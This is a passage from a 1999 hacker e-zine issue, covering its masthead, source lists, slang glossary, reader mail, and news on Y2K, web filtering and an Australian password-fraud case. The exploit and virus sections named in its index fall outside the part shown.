HWA.hax0r.news #12 HTML/Text Version

Cubesoft, our new home. RETURN.
Canc0n99 411 be there or be square

HWA is sponsored by Cubesoft communications www.csoft.net

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 12 Volume 1 1999 April 1st 99 ========================================================================== ** ISSUE 13 will be back to standard text format, htmlizing this file is too much work and bloats up the issue too much, if anyone wants to convert the texts to html though feel free to do so, and credit yourself for the work done as it takes some time to get all the links and make sure demo html is viewable in online versions..... - Ed 010010 0101010101 01010101 0101010101010 010101 010101 010101 01010101 010101 01010101 010101 010101010 0010101010 01010100101010 0101010101 01010101010101 Note that some stuff may not display correctly as I did not fully convert all the text contained in this file to html, it is recommended you read this file in standard text mode... =------------------------------------------------------------------------= "If your hacker admits to having been wrong, don't demand an apology; so far as the hacker is concerned, admitting to being wrong is an apology," - from http://www.plethora.net/~seebs/faqs/hacker.html see sideline, 'proper care and feeding of your hacker' =------------------------------------------------------------------------= Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #12 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #wierdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #12 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the editor.................................................. 03.0 .. Aussie faces 12months jail time ................................. 04.0 .. Mitnick update, another year in jail?............................ 04.1 .. The Bumper Sticker Stays......................................... 04.2 .. Mitnick's Judgment Day at Hand................................... 04.3 .. Why We Still Have to Free Kevin Mitnick.......................... 04.4 .. Mitnick gets 46 months........................................... 05.0 .. Sesquipedalian.c 0 length connection resetting exploit........... 06.0 .. Yet more MSIE5 vulnerabilities................................... 07.0 .. QuickHacks and tips from ManicX.................................. 08.0 .. NT4 index server 2.0 vulnerabilities............................. 09.0 .. Yahoo news ticker has plaintext passwords in config files........ 10.0 .. Defacing websites? read this from bufferoverflow/attrition....... 11.0 .. Security analysis of Satellite command uplinks................... 12.0 .. Melissa Pr0n virus makes it hard for Microsoft users............. 12.1 .. The Melissa macro virus code..................................... 12.2 .. PAPA, a Melissa variant targets specific people with ping fluds.. 12.3 .. PAPA B and the MadCow variants of Melissa already spreading...... 12.4 .. April 1st Melissa virus creator apprehended...................... 13.0 .. [ISN] A hacker's worst nightmare ................................ 13.1 .. How bad is Pentium III privacy threat?........................... 14.0 .. ICQ99 Bug, erh feature turns your icq into a DoSable web server.. 15.0 .. Russian crackers takeout whitehouse.gov?......................... 16.0 .. New Excel macro virus can bypass protections..................... 17.0 .. xfree86 SUSE exploit............................................. 18.0 .. Proper feeding and caring of your new hacker .................... 19.0 .. Unix wardialer from w00w00 security.............................. 20.0 .. Australia gears up security for Olympics ........................ 21.0 .. NetBSD security advisories: umapfs .............................. 21.1 .. NetBSD noexec mount flag advisory ............................... 22.0 .. Checkpoint releases new DHCP based user 'mapping' technology..... 23.0 .. SPAWAR a navy site for the security conscious...go FISH.......... 24.0 .. A Portscan detector.............................................. 25.0 .. Port 21 (FTP) Control port vulnerability scanner................. 26.0 .. WuFTPd scanner................................................... 27.0 .. The Wu-FTPd exploit and patch thread ............................ 28.0 .. Another Wu-FTPd exploit (wh0a.c)................................. 29.0 .. Netscape 4.51 allows url sniffing exploit and patch............. 30.0 .. X11R6 rewt compromise exploit.................................... 31.0 .. Yet another wu-ftpd scanner by 03m0s1s........................... 32.0 .. RedHat Linux security vulnerabilities list from redhat........... 33.0 .. The Suburbanization of Slashdot by Pasty Drone................... 34.0 .. Canada Rolls into Fiscal 2000.................................... 35.0 .. More exploits from the ADM crew ................................. =--------------------------------------------------------------------------= Special Sections. Civil disobedience and hacktivism, hacking contests =--------------------------------------------------------------------------= SP.00 .. Intro: That Wild Wild Cyberfrontier.............................. SP.01 .. Article 1:"Electronic Civil Disobedience and..................... ...........................the World Wide Web of Hacktivism:".... SP.02 .. Article 2:"Digital Zapatismo".................................... ................................................................. SP.C1 .. The Phallusi of cracking contests................................ SP.C2 .. Hacker challenges: Boon or Bane by Gene Spafford................. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. .......................................................................... HA.HA .. Humour and puzzles ............................................ HOW.TO .. New section: "How to hack" by our illustrious editor part 3..... SITE.1 .. Featured site, ................................................. RAW.1 .. We remember Autonet'86.......................................... H.W .. Hacked Websites .............................................. A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra Pasty Drone TwstdPair TheDuece _NeM_ D----Y RTFM99 Kevin Mitnick (watch yer back) ypwitch kimmie vexxation hunchback mack sAs72 Spikeman and the #innerpulse, #hns crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Y2K: Qantas prepared to cancel flights The Y2K problem has proven too much for Australian airline Qantas, which has announced it may have to cancel flights. In a statement to the Australian Stock Exchange (ASX), the airline said it may reduce the number of flights on some domestic and international routes. "Qantas will only flyf it is safe to do so," its report stated. Qantas said it had checked with the manufacturers of its aircraft, which advised "that there are no safety or airworthiness issues relating to the year 2000 compliance of their aircraft". On this basis, the airline said it was satisfied that its business was "unlikely to be significantly disrupted". However, Qantas said services provided by "certain airports and air space authorities" were not compliant, and for this reason contingency plans were being developed. Want the full story? It's at http://newswire.com.au/9903/qy2k.htm ++ School Net filter software bans Bible A Net filtering system used by NSW state schools has been found to inaccurately block certain Web sites, according to online civil liberties group Electronic Frontiers Australia (EFA). Citing a recent report by the US body Censorware Project, EFA said the SmartFilter product used by schools had "problems". The report 'Censored Internet Access in Utah Public Schools and Libraries' found SmartFilter blocked sites featuring all of Shakespeare's plays, the Koran, the 'Adventures of Sherlock Holmes' and a number of safe-sex and AIDS prevention sites, to name just a few. Danny Yee of EFA said SmartFilter's claim that all blocked sites were checked by people was false. http://newswire.com.au/9903/netfilt.htm ++ AOL and Sun to ship in early 2000 AOL and Sun executives have revealed plans for their first jointly developed products. The products, to be shipped early next year, will be available for most major platforms including Linux and Windows NT, and will be sold through a dedicated sales force of more than 500 people. AOL and Sun have also announced they will continue to maintain support for their existing software lines. Details are still unclear about how Sun and AOL/Netscape will develop a multiplatform ecommerce solution, and what form the product will take. http://newswire.com.au/9903/aosun.htm ++ AMAZON TO DO AUCTIONS (BUS. 7:40 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/18788.html The book and music seller plans to take on eBay, OnSale.... Also: A green energy company goes online, announces IPO.... Disney's Blast rejoins the family.... China likes CDMA.... Covad extends DSL nationwide for small businesses.... And ZiaSun says it will take Web-based email everywhere and anywhere. ++ WHEN SECRECY STOPS SCIENCE (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/18740.html Yes, it's bad to share the recipe for a really big bomb. But scientific secrecy can go too far. An MIT colloquium tries to strike a balance. By Chris Oakes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ++ STATES SEEK OS SURRENDER (POL. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/politics/story/18781.html Nineteen states that have accused Microsoft of antitrust violations want to force the company to auction off its Windows operating system. There's still no hint of what the feds want. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yes we really do get a pile of mail in case you were wondering ;-0 heres a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed Delivered-To: dok-cruciphux@dok.org From: "liquid phire" Subject: the unknown netizen Date: Thu, 25 Mar 1999 15:15:34 PST the unknown netizen we are not all sinless, our ethics do not save us from damnation. we are close to gods, but our divinity is tainted with blood. we are not perfect and our mistakes do not go unnoticed. but we are one. it is not one cry that sends a shiver up the spine of every government with something to hide, it is the shouts of a thousand warriors. it is not a few that are imprisioned, it is us all that wear chains. it is not one tear that is shed, it is an ocean of sorrow that drowns everything in it's wake. we are of one mind and we never forget. we are of one body, intertwined electricity, wires and chips. we have but one vision, a world in which rights need not be fought for. as one we fight. as one we will see a new world. as one we are the faceless, the names that will never be lost to time. phiregod liquidphire@hotmail.com please exsuse all errors in grammer/spelling. Get Your Private, Free Email at http://www.hotmail.com -=- -=- Delivered-To: dok-cruciphux@dok.org From: "John Doe" To: cruciphux@dok.org Subject: Book Date: Sat, 27 Mar 1999 05:46:08 PST Mime-Version: 1.0 Content-type: text/plain Dear Editor, I am currently in the process of writing a book looking at the dawn of hacking through to where it is now and on to the future. This book will not be containing any comments designed to inflame the current public perception of hackers, it has been designed to shatter the myths. To do this though, I am in need of some help. I need people to point me in the right direction. I shall also be entering comments from a few hackers if they will let me. One chapter in the book seems to have gotten the interest of a lot of hackers. This chapter is about profiles of hackers. Basically, I write out these profiles without their nicks, names or anything to identify them and show what a 'typical hacker' is if there indeed is one. If you could help me out by putting an article in your net magazine requesting aid for me or by talking to other hackers that are more 'leet' than others so that I can get their opinions. So far, I have spoken to very little people and their talents seem to be more in their head than actually physically used. Any help would be greatly appreciated. Your Sincerely XXXXXXXXXXXX Get Your Private, Free Email at http://www.hotmail.com Send responses to this to me directly for forwarding to the writer cruciphux@dok.org thankyou. ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /*well i tried out an idea with html and it doesn't agree with me *too much double text is created and its a damn load more work to *put together an issue that is html and text readable so we'll be *sticking to text for now. * *Perhaps someone will volunteer time to convert an issue or two to *html or sometime in the future when I have more spare time I may *be able to make html versions, meanwhile ... have fun ... - Cruci * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Aussie man faces 12 months in jail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Perth 'passwords' man appears in court Roulla Yiacoumi A Perth man charged with 37 counts of unlawfully operating a computer system has appeared in court. Christopher Thomas Daniels, 20, did not enter a plea and requested legal advice before his next appearance on April 13. It was alleged Daniels had passwords to 350 Internet accounts, but used just 37 to fraudulently gain $50 worth of Net access (see story). It is believed he was given the account details by a juvenile. Users were not aware their accounts had been compromised; the ISP noticed inconsistencies and contacted police. Detective Senior Constable Mike Wheeler from the WA major fraud squad said people gaining access to Net passwords was a widespread problem, not limited to this particular ISP. The accounts in this case were all with one ISP, Vianet in WA. Vianet managing director Tony Broughton was not available for comment this afternoon. 22/03/99 15:51 Net fraud: Aussie man charged Roulla Yiacoumi A 20-year old Perth man is facing 12 months in jail over Internet fraud amounting to just $50 worth of Net access. Christopher Thomas Daniels of Cannington has been charged by the Western Australian major fraud squad for accessing other people's Internet accounts. He faces 37 counts of unlawfully operating a computer system. According to Detective Senior Constable Mike Wheeler, Daniels admitted to having passwords to more than 350 accounts, but he had used only 37. The accounts were all for prepaid access from one of Australia's larger ISPs, and the customers affected were unaware that their accounts had been accessed. "The ISP noticed inconsistencies and notified us," said Wheeler. "But let me say that this kind of problem is not restricted to just one ISP." The WA man said he was given the passwords by another person, a juvenile who will be subject to a different court system. Daniels is set to appear in court tomorrow. He faces up to 12 months in jail or a fine of up to $4,000. This article is located at http://newswire.com.au/9903/nfraud.htm @HWA 04.0 Mitnick Updates ~~~~~~~~~~~~~~~ 04.1 The Bumper Sticker Stays ~~~~~~~~~~~~~~~~~~~~~~~~ from Chaos theory http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2229344,00.html After reflecting on the long, strange case of Kevin Mitnick, I've decided that the "Free Kevin" bumper 